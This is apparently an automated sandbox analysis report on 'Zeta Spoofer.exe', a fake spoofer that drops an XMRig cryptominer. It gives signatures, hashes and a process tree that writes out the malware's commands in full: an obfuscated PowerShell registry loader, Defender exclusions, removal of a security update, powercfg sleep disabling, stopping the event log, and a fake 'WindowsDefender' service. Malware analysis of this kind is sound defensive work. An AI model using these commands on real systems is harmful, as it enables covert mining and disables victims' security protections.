Resubmissions

27-01-2025 20:41

250127-zghmnsvqbr 10

27-01-2025 20:36

250127-zdqh4svkct 10

Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    27-01-2025 20:36

General

  • Target

    Zeta Spoofer.exe

  • Size

    16.6MB

  • MD5

    58c13144b662425b9373d0687fd6c291

  • SHA1

    0664e627b6539d3ad79cb43d8e3131d5f3bb5b6a

  • SHA256

    57b791d2c6eb50e566e19335af4f848a84fb0695d41afef156abccd753ba94a9

  • SHA512

    c2534c081a34c2f825c59a926c95cdf00c1b23da2290581380c6ad1aa25523cba8e2346c0e54c2b56a7725eda862a2531828ed80edc93e37db9044c41039c960

  • SSDEEP

    393216:5SDLxiW3R0mP1RmUh/ObTeJQlIvfcciFRM3P2lWVPNL+9m+O/:5oLRR0u1RmEOu0Ivfb3NNLz+

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:432
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{ee3eef98-d4e5-4804-b653-8b2295cdd926}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2364
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:480
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch
        2⤵
          PID:588
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            3⤵
              PID:1608
            • C:\Windows\system32\wbem\wmiprvse.exe
              C:\Windows\system32\wbem\wmiprvse.exe
              3⤵
                PID:1728
              • C:\Windows\system32\wbem\wmiprvse.exe
                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                3⤵
                  PID:1768
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k RPCSS
                2⤵
                  PID:668
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                  2⤵
                  • Modifies security service
                  PID:748
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                  2⤵
                    PID:804
                    • C:\Windows\system32\Dwm.exe
                      "C:\Windows\system32\Dwm.exe"
                      3⤵
                        PID:1360
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs
                      2⤵
                        PID:832
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {FC2518EF-CEFB-472F-B38A-6EDAF9029BBD} S-1-5-18:NT AUTHORITY\System:Service:
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1684
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+'a'+'l'+'er'+'s'+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2980
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService
                        2⤵
                          PID:944
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k NetworkService
                          2⤵
                            PID:1008
                          • C:\Windows\System32\spoolsv.exe
                            C:\Windows\System32\spoolsv.exe
                            2⤵
                              PID:736
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                              2⤵
                                PID:984
                              • C:\Windows\system32\taskhost.exe
                                "taskhost.exe"
                                2⤵
                                  PID:1296
                                • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
                                  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
                                  2⤵
                                    PID:1720
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
                                    2⤵
                                      PID:1348
                                    • C:\Windows\system32\sppsvc.exe
                                      C:\Windows\system32\sppsvc.exe
                                      2⤵
                                        PID:1976
                                      • C:\ProgramData\Defenderupdates.exe
                                        C:\ProgramData\Defenderupdates.exe
                                        2⤵
                                        • Drops file in Drivers directory
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of WriteProcessMemory
                                        PID:2388
                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2488
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                          3⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:2152
                                          • C:\Windows\system32\wusa.exe
                                            wusa /uninstall /kb:890830 /quiet /norestart
                                            4⤵
                                            • Drops file in Windows directory
                                            PID:1616
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2468
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2172
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2404
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                          3⤵
                                          • Power Settings
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1204
                                        • C:\Windows\system32\dialer.exe
                                          C:\Windows\system32\dialer.exe
                                          3⤵
                                            PID:1244
                                          • C:\Windows\system32\dialer.exe
                                            C:\Windows\system32\dialer.exe
                                            3⤵
                                              PID:2544
                                            • C:\Windows\system32\dialer.exe
                                              dialer.exe
                                              3⤵
                                              • Modifies data under HKEY_USERS
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2996
                                        • C:\Windows\system32\lsass.exe
                                          C:\Windows\system32\lsass.exe
                                          1⤵
                                            PID:488
                                          • C:\Windows\system32\lsm.exe
                                            C:\Windows\system32\lsm.exe
                                            1⤵
                                              PID:496
                                            • C:\Windows\Explorer.EXE
                                              C:\Windows\Explorer.EXE
                                              1⤵
                                                PID:1396
                                                • C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Zeta Spoofer.exe"
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2532
                                                  • C:\Users\Admin\AppData\Local\Temp\Zeta.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2316
                                                    • C:\Users\Admin\AppData\Local\Temp\Zeta.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Zeta.exe"
                                                      4⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      PID:1888
                                                  • C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe"
                                                    3⤵
                                                    • Drops file in Drivers directory
                                                    • Executes dropped EXE
                                                    • Drops file in System32 directory
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1704
                                                    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      4⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3064
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      4⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2352
                                                      • C:\Windows\system32\wusa.exe
                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                        5⤵
                                                        • Drops file in Windows directory
                                                        PID:3032
                                                    • C:\Windows\system32\powercfg.exe
                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      4⤵
                                                      • Power Settings
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2104
                                                    • C:\Windows\system32\powercfg.exe
                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      4⤵
                                                      • Power Settings
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2308
                                                    • C:\Windows\system32\powercfg.exe
                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      4⤵
                                                      • Power Settings
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1316
                                                    • C:\Windows\system32\powercfg.exe
                                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      4⤵
                                                      • Power Settings
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2516
                                                    • C:\Windows\system32\dialer.exe
                                                      C:\Windows\system32\dialer.exe
                                                      4⤵
                                                        PID:2040
                                                      • C:\Windows\system32\sc.exe
                                                        C:\Windows\system32\sc.exe delete "WindowsDefender"
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:1652
                                                      • C:\Windows\system32\sc.exe
                                                        C:\Windows\system32\sc.exe create "WindowsDefender" binpath= "C:\ProgramData\Defenderupdates.exe" start= "auto"
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:1740
                                                      • C:\Windows\system32\sc.exe
                                                        C:\Windows\system32\sc.exe stop eventlog
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:2920
                                                      • C:\Windows\system32\sc.exe
                                                        C:\Windows\system32\sc.exe start "WindowsDefender"
                                                        4⤵
                                                        • Launches sc.exe
                                                        PID:2936
                                                • C:\Windows\system32\conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe "-919612886-113640727-552900401-759548675991583391794867174-711317177-2065773916"
                                                  1⤵
                                                    PID:2568

                                                  Network

                                                  MITRE ATT&CK Enterprise v15

                                                  Replay Monitor

                                                  Loading Replay Monitor...

                                                  Downloads

                                                  • C:\Users\Admin\AppData\Local\Temp\Zeta.exe

                                                    Filesize

                                                    11.3MB

                                                    MD5

                                                    f79df4f96e90110491b16131ad54f231

                                                    SHA1

                                                    307be8cf98adb6c2f359ffa67c8e9476febadd5a

                                                    SHA256

                                                    817967415a85915d7d4b1ac89b3f0d0ae8c1fce55cb90d20c0893e191754ea1a

                                                    SHA512

                                                    ffa198a828b57344280065036eea34e928672bbdaba6fedbf3137cd69246a265bd0fbb7803e6806e474d2c96de4dc9a9cfa0f35b617b045673759afd976ee0c9

                                                  • C:\Windows\system32\drivers\etc\hosts

                                                    Filesize

                                                    1013B

                                                    MD5

                                                    27cfde53cb5a0cc9608f754760735896

                                                    SHA1

                                                    1610941c4bfff2f330eb8ae96006d8e216fc5ece

                                                    SHA256

                                                    12df6caaf3658022c70ef87f4b39ffeaf4abb6d269cd2ba12c4d354c459c7e2f

                                                    SHA512

                                                    535afd5d12005a856a44f7f7cd2a623b1c483ea4e9d63d06c610407aa45a721854c3975d4b2b4af6949d81c09151d809d521f2fe9253bf402d15869e83a6c289

                                                  • \Users\Admin\AppData\Local\Temp\ZetaSpoofer.exe

                                                    Filesize

                                                    5.3MB

                                                    MD5

                                                    7bda2ed86f648c8528531d76f0a53f2a

                                                    SHA1

                                                    5c852efdb51b00cbfa0dc0ca0d017a3f52dae069

                                                    SHA256

                                                    667849a179671c441d44de621592f75bb3a2233f3c70370122fba047720e61e2

                                                    SHA512

                                                    075d1475b87ca7b2e1096077ffa58a7dd880c2f7f9a67b5283ed14223b9fd941f9136caff782a6ca8fc0831aaccb509fe44968447d2f1dd665bbd4cd9acda356

                                                  • \Users\Admin\AppData\Local\Temp\_MEI23162\python39.dll

                                                    Filesize

                                                    4.2MB

                                                    MD5

                                                    2a9c5db70c6906571f2ca3a07521baa2

                                                    SHA1

                                                    765fa27bbee6a02b20b14b2b78c92a880e6627e5

                                                    SHA256

                                                    c69ce89b0487d86a63b64951207781f8051282afde67b20d3b8374c1a067f611

                                                    SHA512

                                                    fa4a677eaae2d258ac4f083a4e7009d985523b964ada93f53dc399a88c14970c7be2d2f39a7b38a922b58d134df2ede954554dcd00a4895e4273161867acac53

                                                  • memory/432-2031-0x0000000000C20000-0x0000000000C45000-memory.dmp

                                                    Filesize

                                                    148KB

                                                  • memory/432-2045-0x00000000379E0000-0x00000000379F0000-memory.dmp

                                                    Filesize

                                                    64KB

                                                  • memory/432-2044-0x000007FEBF690000-0x000007FEBF6A0000-memory.dmp

                                                    Filesize

                                                    64KB

                                                  • memory/432-2043-0x0000000000C50000-0x0000000000C7B000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/432-2029-0x0000000000C20000-0x0000000000C45000-memory.dmp

                                                    Filesize

                                                    148KB

                                                  • memory/432-2032-0x0000000000C50000-0x0000000000C7B000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/432-2035-0x0000000000C50000-0x0000000000C7B000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/2040-1976-0x0000000140000000-0x000000014002B000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/2040-1972-0x0000000140000000-0x000000014002B000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/2040-1973-0x0000000140000000-0x000000014002B000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/2040-1974-0x0000000140000000-0x000000014002B000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/2040-1971-0x0000000140000000-0x000000014002B000-memory.dmp

                                                    Filesize

                                                    172KB

                                                  • memory/2364-2026-0x0000000140000000-0x0000000140008000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/2364-2018-0x0000000140000000-0x0000000140008000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/2364-2019-0x0000000140000000-0x0000000140008000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/2364-2020-0x0000000140000000-0x0000000140008000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/2364-2021-0x0000000140000000-0x0000000140008000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/2364-2023-0x0000000140000000-0x0000000140008000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/2364-2024-0x00000000779A0000-0x0000000077B49000-memory.dmp

                                                    Filesize

                                                    1.7MB

                                                  • memory/2364-2025-0x0000000077780000-0x000000007789F000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/2488-1982-0x0000000019D70000-0x000000001A052000-memory.dmp

                                                    Filesize

                                                    2.9MB

                                                  • memory/2488-1983-0x0000000000A50000-0x0000000000A58000-memory.dmp

                                                    Filesize

                                                    32KB

                                                  • memory/2532-3-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

                                                    Filesize

                                                    9.6MB

                                                  • memory/2532-428-0x000007FEF5540000-0x000007FEF5EDD000-memory.dmp

                                                    Filesize

                                                    9.6MB

                                                  • memory/2532-0-0x000007FEF57FE000-0x000007FEF57FF000-memory.dmp

                                                    Filesize

                                                    4KB

                                                  • memory/2544-1998-0x0000000140000000-0x000000014000E000-memory.dmp

                                                    Filesize

                                                    56KB

                                                  • memory/2544-2000-0x0000000140000000-0x000000014000E000-memory.dmp

                                                    Filesize

                                                    56KB

                                                  • memory/2544-1995-0x0000000140000000-0x000000014000E000-memory.dmp

                                                    Filesize

                                                    56KB

                                                  • memory/2544-1994-0x0000000140000000-0x000000014000E000-memory.dmp

                                                    Filesize

                                                    56KB

                                                  • memory/2544-1993-0x0000000140000000-0x000000014000E000-memory.dmp

                                                    Filesize

                                                    56KB

                                                  • memory/2544-1992-0x0000000140000000-0x000000014000E000-memory.dmp

                                                    Filesize

                                                    56KB

                                                  • memory/2980-2015-0x0000000000B50000-0x0000000000B7A000-memory.dmp

                                                    Filesize

                                                    168KB

                                                  • memory/2980-2016-0x00000000779A0000-0x0000000077B49000-memory.dmp

                                                    Filesize

                                                    1.7MB

                                                  • memory/2980-2017-0x0000000077780000-0x000000007789F000-memory.dmp

                                                    Filesize

                                                    1.1MB

                                                  • memory/2996-2002-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2003-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2010-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2008-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2009-0x0000000000050000-0x0000000000070000-memory.dmp

                                                    Filesize

                                                    128KB

                                                  • memory/2996-2004-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2014-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2011-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2013-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2005-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2006-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2012-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/2996-2007-0x0000000140000000-0x0000000140835000-memory.dmp

                                                    Filesize

                                                    8.2MB

                                                  • memory/3064-1968-0x000000001B640000-0x000000001B922000-memory.dmp

                                                    Filesize

                                                    2.9MB

                                                  • memory/3064-1969-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

                                                    Filesize

                                                    32KB